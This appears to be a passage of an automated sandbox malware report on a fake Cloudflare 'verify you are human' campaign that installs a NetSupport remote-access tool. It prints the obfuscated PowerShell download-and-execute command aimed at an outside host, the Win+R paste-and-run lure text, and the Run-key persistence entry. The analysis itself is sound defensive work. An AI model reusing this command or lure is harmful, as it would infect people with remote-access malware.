                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_110076F0 LoadCursorA, SetCursor, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SelectClipRgn, BitBlt, SelectClipRgn, DeleteObject, DeleteDC, BitBlt, ReleaseDC, CreatePen, CreateSolidBrush, GetSysColor, LoadBitmapA, _memset, _swscanf, CreateFontIndirectA, _memset, GetStockObject, GetObjectA, CreateFontIndirectA, GetWindowRect, SetWindowTextA, GetSystemMetrics, GetSystemMetrics, SetWindowPos, UpdateWindow, SetCursor
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11113880 PeekMessageA, GetKeyState, GetKeyState, GetKeyState, Sleep, GetKeyState
                                  Source: Yara match, File source: 21.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 21.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara match, File source: Process Memory Space: client32.exe PID: 7368, type: MEMORYSTR
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_111158B0 SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, RegCloseKey, SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, SystemParametersInfoA, RegCloseKey, SystemParametersInfoA

                                  System Summary

                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11115750 GetModuleFileNameA, GetShortPathNameA, CreateFileA, CreateFileA, CreateFileA, DeviceIoControl, CloseHandle
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_1115DB40 FindWindowA, _memset, CreateProcessAsUserA, GetLastError, WinExec, CloseHandle, CloseHandle, CloseHandle, WinExec
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_1102D330 InterlockedIncrement, Sleep, Sleep, GetCurrentProcess, SetPriorityClass, SetEvent, Sleep, PostThreadMessageA, PostThreadMessageA, CloseHandle, _free, _free, GetModuleFileNameA, GetFileAttributesA, _memset, FindFirstFileA, FindNextFileA, FindNextFileA, FindClose, ExitWindowsEx, ExitWindowsEx, Sleep, ExitWindowsEx, Sleep, ExitProcess
Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine, Classification label: mal100.rans.phis.troj.evad.win@30/39@14/9
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11059C50 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11089150 FindResourceA,LoadResource,LockResource
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mshhzrqx.05j.ps1
Source: C:\Windows\System32\mshta.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html"
Source: unknown, Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293''
Source: C:\Windows\System32\mshta.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\bpsFyf
Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe"
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                  Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\bpsFyf\client32.iniJump to behavior
                                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeFile opened: C:\Users\user\AppData\Roaming\bpsFyf\MSVCR100.dllJump to behavior
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2429888490.0000000073D72000.00000002.00000001.01000000.00000010.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000015.00000002.2427957833.0000000073C41000.00000020.00000001.01000000.00000012.sdmp, msvcr100.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.2429698530.0000000073D55000.00000002.00000001.01000000.00000011.sdmp, pcicapi.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.12.dr

                                  Data Obfuscation

                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,21_2_11029590
                                  Source: PCICL32.DLL.12.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7114AED push ebx; retf 0064h12_2_00007FFEB7114B1A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C66D8 pushad ; retf 12_2_00007FFEB75C66D9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB78702CA pushad ; iretd 12_2_00007FFEB78702CB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB78702BA push eax; iretd 12_2_00007FFEB78702BB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7A433F4 push esp; iretd 12_2_00007FFEB7A433F5
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116F055 push ecx; ret 21_2_1116F068
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11169F49 push ecx; ret 21_2_11169F5C
                                  Source: msvcr100.dll.12.drStatic PE information: section name: .text entropy: 6.909044922675825

                                  Persistence and Installation Behavior

                                  Source: Chrome DOM: 2.3OCR Text: CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. conn You will observe and agree: "Versify you are hutzri - Ray Verification 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare
                                  Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps ENG English (United Kingdom) To better prove you are not a robot, please: SG Swiss German keyboard ENG English (United Kingdom) 1. Press & hold the Windows Key + R Clou urity of your DE German keyboard 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:45 ENG p Type here to search 28/10/2024
                                  Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:45 ENG p Type here to search SG 28/10/2024
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLLJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,21_2_11127E10
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,21_2_11139090
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,21_2_1115B1D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,21_2_11113290
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,21_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,21_2_110254A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,21_2_110258F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,21_2_11023BA0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,21_2_11024280
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11112670 IsIconic,GetTickCount,21_2_11112670
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,21_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,21_2_110C0BB0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,21_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_11143570
                                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
